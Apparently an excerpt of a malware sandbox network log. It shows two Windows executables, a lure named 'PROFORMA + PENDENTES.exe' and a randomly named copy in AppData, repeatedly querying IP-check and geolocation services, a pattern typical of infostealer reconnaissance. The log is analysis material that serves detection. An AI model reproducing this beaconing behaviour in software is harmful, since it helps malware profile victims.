                                            Nov 18, 2024 18:18:49.162628889 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:49 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 73a9f247c924c3d0ab1c46e3c38c1b37
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.849717158.101.44.242805420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:49.819799900 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:18:50.456991911 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:50 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 7a4cfd31bab2d1885db1445144f83b3c
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                            Nov 18, 2024 18:18:50.461107969 CET127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Nov 18, 2024 18:18:50.607223988 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:50 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 430e890b77f2aecfc2d611a2ae37df82
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                            Nov 18, 2024 18:18:51.547415018 CET127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Nov 18, 2024 18:18:51.694720030 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:51 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 20ee997077f340b3ccd55390cd3a24bf
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.849718158.101.44.242803636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:50.000060081 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:18:50.657566071 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:50 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: be8a03a05d1640fb63228012d406f5c1
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.849721158.101.44.242803636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:51.513005972 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:18:52.162961006 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:52 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: c46e72bf224359e240cd25447b1c94f0
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.849724158.101.44.242805420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:52.726176977 CET127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Nov 18, 2024 18:18:53.412066936 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:53 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: af6f8e36e52664b5f8dfc299b4fcf511
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.849725158.101.44.242803636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:52.990466118 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:18:53.654767036 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:53 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: ddd9eaecf8f5509cbb2dd7c952778468
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.849731158.101.44.242805420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:54.194538116 CET127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Nov 18, 2024 18:18:54.843444109 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:54 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: df3a9545a51528a6095d35c7550061ed
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.849732158.101.44.242803636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:54.498285055 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:18:55.139745951 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:55 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 5c88b0ab8a5695676cacd0a62437f08e
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.849736158.101.44.242805420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:55.732147932 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:18:56.969085932 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:56 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 699b1bb4d999ae69457de927bfd02ec8
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                            Nov 18, 2024 18:18:56.969322920 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:56 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 699b1bb4d999ae69457de927bfd02ec8
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                            Nov 18, 2024 18:18:56.969469070 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:56 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 699b1bb4d999ae69457de927bfd02ec8
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.849738158.101.44.242805420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:57.955004930 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:18:58.976974010 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:58 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 62f5455bdc3326f9ce48cc38bbe4bc5f
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.849740158.101.44.242805420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:59.830641985 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:19:00.469577074 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:19:00 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 2dcffc2d57e31343f44d12c0158eaab8
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.849742158.101.44.242805420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:19:01.317320108 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:19:02.925770998 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:19:02 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 5022fe0e52dfc3f7be21d53143b44149
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.849711188.114.97.34433636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:45 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-11-18 17:18:45 UTC855INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:45 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 51799
                                            Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2l9zOJIn%2F6tL4UZREvJsf8LZ0Gdx3iGRXNxWS%2Fh3Aw0a7m4RmD8V%2BzWCEIP8Y3ItmuFuWKQBszIbLtzF8TZLWcj9EaKWhIuI0Nln43p30m%2F04W%2F63fQC8nhHuJCxis4r2dhc2%2Bp4"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f1f19e4e73b-DEN
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=18914&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=153008&cwnd=32&unsent_bytes=0&cid=946b81b8856f4cd9&ts=295&x=0"
                                            2024-11-18 17:18:45 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.849712188.114.97.34433636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:46 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-11-18 17:18:46 UTC849INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:46 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 394
                                            Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6H8OkkAHTclkf8uR6lTGhupHeig%2B7uuLx21UC%2FgyzlkVPZenqqD0W3axJZY0R2A9xeX0nkrVmO5EvBc8mywj%2BZg2WnJFdYmWeR7xlgBFzYd59OpRHhljJIj%2BVSaLSS5uprtlW416"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f272a0c2231-ORD
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=23569&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=122395&cwnd=32&unsent_bytes=0&cid=e208289ad325f8be&ts=174&x=0"
                                            2024-11-18 17:18:46 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.849714188.114.97.34433636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:48 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-11-18 17:18:48 UTC849INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 396
                                            Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81PgmDNe%2FvyuXzMegnIIpmfurjIOJOZuwzQzKvbh7fGImF2DN%2FP5alxZXT0PP5Chj4Jk7BgBBcJRa8%2FSNtacFJrQiEn1k95RZsKmguEXZXNBbrhEAewwY6zCusSOndCqww%2F5V6mL"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f30993cdada-ORD
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=23680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=121217&cwnd=32&unsent_bytes=0&cid=8b63719b1a82aa36&ts=178&x=0"
